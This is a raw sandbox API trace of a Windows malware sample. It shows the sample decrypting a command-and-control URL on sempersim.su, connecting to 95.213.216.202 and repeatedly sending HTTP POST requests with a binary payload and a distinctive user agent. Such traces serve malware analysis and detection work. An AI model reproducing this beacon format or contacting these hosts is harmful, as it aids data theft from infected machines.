out: ppResult=0x19fcd8*=0x644198*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0138.174] GetProcessHeap () returned 0x620000 [0138.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b660 [0138.174] socket (af=2, type=1, protocol=6) returned 0x2dc [0138.174] connect (s=0x2dc, name=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0138.227] FreeAddrInfoW (pAddrInfo=0x644198*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0138.227] GetProcessHeap () returned 0x620000 [0138.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0138.227] GetProcessHeap () returned 0x620000 [0138.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0138.228] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0138.229] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0138.229] GetProcessHeap () returned 0x620000 [0138.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0138.229] GetProcessHeap () returned 0x620000 [0138.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0138.230] GetProcessHeap () returned 0x620000 [0138.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6435a8 [0138.230] GetProcessHeap () returned 0x620000 [0138.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0138.231] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0138.232] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0138.232] GetProcessHeap () returned 0x620000 [0138.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0138.232] GetProcessHeap () returned 0x620000 [0138.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0138.232] send (s=0x2dc, buf=0x63a880*, len=237, flags=0) returned 237 [0138.233] send (s=0x2dc, buf=0x6421e0*, len=159, flags=0) returned 159 [0138.233] GetProcessHeap () returned 0x620000 [0138.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0138.233] recv (in: s=0x2dc, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0139.903] GetProcessHeap () returned 0x620000 [0139.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0139.904] GetProcessHeap () returned 0x620000 [0139.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0139.904] GetProcessHeap () returned 0x620000 [0139.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0139.905] GetProcessHeap () returned 0x620000 [0139.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0139.905] closesocket (s=0x2dc) returned 0 [0139.907] GetProcessHeap () returned 0x620000 [0139.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0139.907] GetProcessHeap () returned 0x620000 [0139.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0139.907] GetProcessHeap () returned 0x620000 [0139.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0139.907] GetProcessHeap () returned 0x620000 [0139.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0139.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5f4) returned 0x2dc [0139.911] Sleep (dwMilliseconds=0xea60) [0139.917] GetProcessHeap () returned 0x620000 [0139.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643008 [0139.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.918] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0139.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.930] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0139.944] GetProcessHeap () returned 0x620000 [0139.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0139.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.945] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0139.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.946] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0139.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.947] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0139.953] GetProcessHeap () returned 0x620000 [0139.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0139.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.955] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643008, pdwDataLen=0x19fcfc | out: pbData=0x643008, pdwDataLen=0x19fcfc) returned 1 [0139.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.956] CryptDestroyKey (hKey=0x62d710) returned 1 [0139.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.957] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0139.958] GetProcessHeap () returned 0x620000 [0139.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0139.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.959] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0139.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.960] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0139.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.961] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0139.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.962] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0139.962] GetProcessHeap () returned 0x620000 [0139.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0139.962] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0139.962] GetProcessHeap () returned 0x620000 [0139.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0139.963] GetProcessHeap () returned 0x620000 [0139.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0139.963] GetProcessHeap () returned 0x620000 [0139.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643008 | out: hHeap=0x620000) returned 1 [0139.966] GetProcessHeap () returned 0x620000 [0139.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0139.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.967] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0139.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0139.984] GetProcessHeap () returned 0x620000 [0139.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0139.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.985] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0139.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.986] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0139.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.988] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0139.988] GetProcessHeap () returned 0x620000 [0139.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0139.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.989] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0139.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.990] CryptDestroyKey (hKey=0x62d190) returned 1 [0139.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0139.991] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0139.991] GetProcessHeap () returned 0x620000 [0139.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0139.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.992] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0139.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.993] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0139.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0139.994] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0139.995] GetProcessHeap () returned 0x620000 [0139.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0139.995] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x643ef0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0139.999] GetProcessHeap () returned 0x620000 [0139.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0139.999] socket (af=2, type=1, protocol=6) returned 0x2e0 [0140.000] connect (s=0x2e0, name=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0140.051] FreeAddrInfoW (pAddrInfo=0x643ef0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0140.051] GetProcessHeap () returned 0x620000 [0140.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0140.051] GetProcessHeap () returned 0x620000 [0140.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0140.052] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0140.053] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0140.053] GetProcessHeap () returned 0x620000 [0140.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0140.053] GetProcessHeap () returned 0x620000 [0140.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0140.053] GetProcessHeap () returned 0x620000 [0140.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0140.053] GetProcessHeap () returned 0x620000 [0140.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0140.056] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0140.057] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0140.057] GetProcessHeap () returned 0x620000 [0140.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0140.058] GetProcessHeap () returned 0x620000 [0140.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0140.058] send (s=0x2e0, buf=0x63a880*, len=237, flags=0) returned 237 [0140.059] send (s=0x2e0, buf=0x6421e0*, len=159, flags=0) returned 159 [0140.059] GetProcessHeap () returned 0x620000 [0140.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0140.059] recv (in: s=0x2e0, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0141.471] GetProcessHeap () returned 0x620000 [0141.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0141.472] GetProcessHeap () returned 0x620000 [0141.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0141.472] GetProcessHeap () returned 0x620000 [0141.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0141.472] GetProcessHeap () returned 0x620000 [0141.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0141.473] closesocket (s=0x2e0) returned 0 [0141.474] GetProcessHeap () returned 0x620000 [0141.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0141.474] GetProcessHeap () returned 0x620000 [0141.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0141.474] GetProcessHeap () returned 0x620000 [0141.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0141.475] GetProcessHeap () returned 0x620000 [0141.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0141.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12c4) returned 0x2e0 [0141.477] Sleep (dwMilliseconds=0xea60) [0141.479] GetProcessHeap () returned 0x620000 [0141.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0141.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.480] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0141.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.488] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0141.501] GetProcessHeap () returned 0x620000 [0141.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0141.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.502] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0141.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.503] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0141.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.504] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0141.504] GetProcessHeap () returned 0x620000 [0141.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0141.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.505] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0141.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.506] CryptDestroyKey (hKey=0x62d710) returned 1 [0141.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.507] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0141.507] GetProcessHeap () returned 0x620000 [0141.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0141.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.508] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0141.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.509] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0141.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.534] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0141.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.537] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0141.537] GetProcessHeap () returned 0x620000 [0141.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0141.537] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0141.537] GetProcessHeap () returned 0x620000 [0141.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0141.538] GetProcessHeap () returned 0x620000 [0141.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0141.538] GetProcessHeap () returned 0x620000 [0141.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0141.538] GetProcessHeap () returned 0x620000 [0141.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0141.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.539] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0141.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.545] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0141.552] GetProcessHeap () returned 0x620000 [0141.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0141.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.553] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0141.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.554] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0141.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.555] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0141.555] GetProcessHeap () returned 0x620000 [0141.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0141.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.557] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0141.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.558] CryptDestroyKey (hKey=0x62d190) returned 1 [0141.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0141.562] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0141.562] GetProcessHeap () returned 0x620000 [0141.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0141.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.563] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0141.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.564] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0141.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0141.565] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0141.565] GetProcessHeap () returned 0x620000 [0141.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0141.565] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x643ea0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0141.568] GetProcessHeap () returned 0x620000 [0141.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0141.568] socket (af=2, type=1, protocol=6) returned 0x2e4 [0141.568] connect (s=0x2e4, name=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0141.624] FreeAddrInfoW (pAddrInfo=0x643ea0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0141.624] GetProcessHeap () returned 0x620000 [0141.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0141.624] GetProcessHeap () returned 0x620000 [0141.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0141.625] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0141.626] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0141.626] GetProcessHeap () returned 0x620000 [0141.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 